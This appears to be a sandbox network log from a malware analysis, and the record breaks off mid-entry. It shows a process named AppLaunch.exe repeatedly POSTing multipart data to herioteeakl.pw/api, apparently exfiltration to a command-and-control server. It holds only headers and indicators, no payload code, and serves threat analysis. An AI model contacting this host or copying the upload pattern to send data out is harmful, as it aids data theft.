POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=qp9c2orf38j54f5dpln8ldc8gq; expires=Fri, 08 Mar 2024 18:18:03 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:24 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DSG%2BovT%2Birh5DBdu5%2Ff0KvTXStY6gf1kYlfwyVUFBHABYqGZTt46VkDSUFwvYicJcO7df9P7lmCahUkuHXUTm6oBJDs0Kh4mslButlAZGOWQ0iotTz14tNKQ5d8ZjbjSsA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26c2195366d0-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=lqtnv3bo51or02eps0rhqjlocf; expires=Fri, 08 Mar 2024 18:18:03 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:24 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H2Yp1zo0rLuGWSAa6JVsDoy6vnY%2FKxXgSfXBH7e9b9GqqRq7wIk6HQkg%2BGIchBuLFCZI9c2BGvH5cJE5UTJqCbkHeRDPKDijnQfZ%2BrErngyrkoGFSLuxwSgu0HyOiiMckQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26c349ef0eaa-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 16324
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=s5i0gagn3flg7gfkj8l1nrhuvg; expires=Fri, 08 Mar 2024 18:18:04 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:25 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aySdIDcYlqFUTfRhbLEIQ9wIcpRogC7NUt%2B8kphBXMmH5O234BK0R9gOLdrC%2BaDceOZGctCuLfWKobI0jC6Xp6SoSRKkxktsh3rArCcHk8kT7jT8Y1S%2F7pf7P9I%2BujzSiA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26c62b17b7f8-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=f5o3g0pci87gc8us4jpu5lqie1; expires=Fri, 08 Mar 2024 18:18:04 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:25 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0ar2cpWHJQtZ39GPCzdHVE0qS1jzZ7xfGz%2FZRVqkSbMpuexhZ8UO5bQ51g0n3%2B8IGBHpkdPosMWVm4jWSkDPdHwGWMwd0Ao5WSDuk5jdViL7luXTaTj%2BAANCM3f0gCBzEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26c84db40b4a-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=752i5ni9rpcsu3jer9ghth826a; expires=Fri, 08 Mar 2024 18:18:04 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:25 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qt43Vip%2FFfYUOgWYwWAHQluRhegMZJsG6AUueNQXd9eV2pKVyqr5qnyl1u6pZixxdpGV02o0t9a1mKlWGh3ZFhbGkzMHlNO05Dg2cKFzQ13sS4M%2BBQzZj4uEgDmckItyWw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26c97f2d0ae1-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=pgnbqvljrqpcdsceo0bei0b6q3; expires=Fri, 08 Mar 2024 18:18:05 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:26 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NHZEvsq%2BNUb5felgR5wbuY5enKSkRNP8U5Fu2fnDlGijx2LHaRV1m74vwTHPmATY0p7P7R3zRAFlYavzbs%2BTAWpwNuVxRH2NJyXKD1ZN8%2BDnvtJypwC3vdr0ChfEJ3FQPA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26cbde621b02-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ku4ufutpem19lss040oj4evsm7; expires=Fri, 08 Mar 2024 18:18:05 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:26 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AM1aant9qZJZtGEIb8if66jDcHPbaIr7SaRxVgEtbx%2FubmfP1dY3e5Hc1m2ShD5HviQH74zv94BO1y6biY9Y0BOV1HKOdcZm%2Bmg64c9JDeAVzoyPjpLuKRVgwZJ9edREHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26ccfb511c1d-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=10kvu8ume5et8pl8el3eujdocu; expires=Fri, 08 Mar 2024 18:18:05 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:26 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VIJsOd%2FK26ZKR4ytDW%2FYml9A%2FehFqZK4w1Xq1ODrAxbf1TqF35RSdi5k3%2Fa%2Bo7dhWsMbHY78vIGmPv3YqwTL1wonkjdVpExAsqiKwC9AUpD%2FZLxOlfbd70BFkyr%2B4K0tMg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26ce2e411c93-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=plduc48dj6gmhtolsv1mgmchq3; expires=Fri, 08 Mar 2024 18:18:05 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:26 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2rhD1DxjcLwwg35Px0xATMPYX9%2F29wShHVl6JqKWqnFujKSuqYCoVL1ACuojtFrOJGQrN%2B5NyED%2B5Fh8CNHHMzPlSm%2Bs1%2BFGmJStxGrjjVMOUpqNVSOUfPA2SFg8ztgyOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26cf5f4b66ed-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=svo2nte0ud2hc41s4e9vqleo87; expires=Fri, 08 Mar 2024 18:18:05 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:26 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=acaKWO4jB3ISW4feyHJlrJdBOPAx8MWiu%2BqmApUvunY961nxoGlr%2Bly%2FEubObpyCZ9b%2BkehVrlPVh2D7xQKR795L3o1PGpuYUGH7kvuu5Z4tTNCAV1l%2FGGXmBsA6%2BYYL4A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26d07f816637-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=b1sv6k6nb51c29kr3kcsvpngn1; expires=Fri, 08 Mar 2024 18:18:06 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:27 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eGT8kX2DuQrFL0dDDsTy9Sp%2BOGtL7d7uZJHq4cHgXHu36nkNaArMCfflkha3Jwh1YWIdzt0iaNAY9Dj3YKUm%2BAo8oVKkJztmosFHhDDo20uAoG4CIlxGaG8zmlpP5J6GHA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26d18e2d0e24-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=24gsamrptspcfsldj65im2jviq; expires=Fri, 08 Mar 2024 18:18:06 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:27 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7WPNuM4qJloiUTvlTIhzeaPJD4d88eTAQc05VaPWtm0oKH2gJFG6h%2FM5ZYB7gNhNt6V4ixr8bkY1zbiV%2FBzV0ueerhxBTGn8RMj5iKpdlVvhe1B6Y1CS5F2P3ElgUuZeiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26d2ea62d0d5-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=rnsjepla59tqqok92pbaehdn5h; expires=Fri, 08 Mar 2024 18:18:06 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:27 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OYoxprkYGEjDOn72NBjAM3H%2F%2Bfr8LwQNjeM%2BOd91R6jAWdYrrmLUbtZqulTE17fQEOaULkF%2Fi7PsGQrBKXVcGQaAr2WKmkUMgvFYELwmm7RaDmkyI57SFou%2F8LjVAKv%2FoA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26d45dec6645-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 13169
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ql8vj3ptet24ilp40gj223j5dd; expires=Fri, 08 Mar 2024 18:18:07 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:28 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4ZsHEcXsKmwtCdk%2FKYNXPqrzMnA975drb3DsCWkai9NnmunnjkODpwJk9vG%2Bhya5OD6SfeE8UE9N51augzh6etLyb5gu1cQkAGA7D3Motcdr0SsHixHiNge0BKOKBOoWMw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26d7ffdd1cca-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=hn6jikk2cap6d1npcv6eejuoes; expires=Fri, 08 Mar 2024 18:18:07 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:28 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i%2F9TNIwWHbbJ%2FMl48fjsdD%2B1KyszprVNYwe29nLOvB1o04HeDwvAhd9%2FrI6YoktZOBFBuEhJwAMXOTCjg08KZY1l%2F6Y71Oc80aqqiUG1SBNQ6ykx25w9mNC1z%2Ba62jQjdg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26d90c75b962-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=4b0ed39mb7cs6jiv6ur7e4f46f; expires=Fri, 08 Mar 2024 18:18:07 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:28 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GHgaFQMQJ7rUi5bQNEa%2FQPpeVlLUQqxxsIFcaVvAYWIzOt5Xcbqc8Fa6AWZ8YxXfo1Ah9q8fjJwCI7fJEZaHUUiLMtp63v9xhKx%2F94IG%2BDpCNruGXhIUbV5C4fVI%2Fl3j4A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26da2c510eb1-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

